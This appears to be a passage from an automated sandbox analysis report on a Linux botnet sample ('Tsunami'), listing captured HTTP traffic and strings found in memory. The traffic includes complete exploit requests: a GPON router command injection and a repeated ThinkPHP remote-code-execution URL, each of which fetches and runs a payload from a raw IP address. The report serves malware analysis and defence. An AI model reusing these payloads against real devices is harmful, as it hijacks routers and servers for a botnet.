    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:04:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeServer: LANCOM 1811n Wireless 8.50.0214 / 13.12.2011Date: Sat, 14 May 2022 00:05:09 GMTContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 74 69 74 6c 65 3e 46 75 6e 6b 65 5f 31 38 31 31 6e 20 2d 20 45 72 72 6f 72 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 6c 6f 67 69 6e 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 20 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 6e 63 6f 6d 2d 73 79 73 74 65 6d 73 2e 64 65 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 69 6d 67 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 70 72 6f 64 75 63 74 6e 65 77 2e 6a 70 65 67 22 20 61 6c 74 3d 22 4c 41 4e 43 4f 4d 20 53 79 73 74 65 6d 73 20 48 6f 6d 65 70 61 67 65 22 3e 3c 2f 61 3e 3c 70 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 70 22 3e 4c 41 4e 43 4f 4d 20 31 38 31 31 6e 20 57 69 72 65 6c 65 73 73 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 63 6f 6e 74 65 6e 74 20 64 75 6c 6c 45 72 72 6f 72 22 3e 0d 0a 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 59 6f 75 20 61 73 6b 65 64 20 66 6f 72 20 61 20 55 52 4c 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3c 2f 70 3e 0d 0a 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 61 63 74 69 6f 6e 3d 22 2f 22 20 3e 0d 0a 3c 64 69 76 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 50 61 67 65 4c 69 6e 6b 22 20 61 63 63 65 73 73 6b 65 79 3d 22 62 22 20 6f 6e 63 6c 69 63 6b 3d 22 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 27 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 27 3e 42 3c 2f 73 70 61 6e 3e 61 63 6b 20 74 6f 20 4d 61 69 6e 2d 50 61 67 65 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 3c
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 02:12:19 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: CherryPy/18.6.1Date: Sat, 14 May 2022 00:05:24 GMTVary: Accept-EncodingContent-Encoding: gzipContent-Length: 174
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: WebServerDate: Sat, 14 May 2022 00:05:23 GMTContent-Type: text/htmlContent-Length: 110Connection: closeData Raw: 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a Data Ascii: <title>404 Not Found</title><h1>404 Not Found</h1>The resource requested could not be found on this server.
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not foundConnection: closeData Raw: 34 30 34 3a 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a Data Ascii: 404: File not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.4.6 (Ubuntu)Date: Sat, 14 May 2022 00:05:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e8 99 29 68 84 26 95 e6 95 94 6a 22 2b d5 07 59 06 32 5c 1f ea 50 00 64 cf a9 ac b1 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 8c(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU)h&j"+Y2\Pd0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: Ratchet/0.4.4
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1050Date: Sat, 14 May 2022 00:05:40 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:05:45 GMTServer: Apache/2.2.14Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 181Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h|~tF
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:05:47 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 113Date: Sat, 14 May 2022 00:05:47 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error report</title></head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:05:45 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 04:35:54 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: VC3SWrkssz, 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmpString found in binary or memory: http://103.136.43.52/bin
    Source: VC3SWrkssz, 6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, VC3SWrkssz, 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmpString found in binary or memory: http://103.136.43.52/bins/Tsunami.mips;
    Source: VC3SWrkssz, 6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, VC3SWrkssz, 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmpString found in binary or memory: http://103.136.43.52/bins/Tsunami.x86
    Source: VC3SWrkssz, 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmpString found in binary or memory: http://103.136.43.52/zyxel.sh;
    Source: VC3SWrkssz, 6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, VC3SWrkssz, 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: VC3SWrkssz, 6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, VC3SWrkssz, 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
    Source: VC3SWrkssz, 6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, VC3SWrkssz, 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: VC3SWrkssz, 6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, VC3SWrkssz, 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
    Source: VC3SWrksszString found in binary or memory: http://upx.sf.net
    Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://103.136.43.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
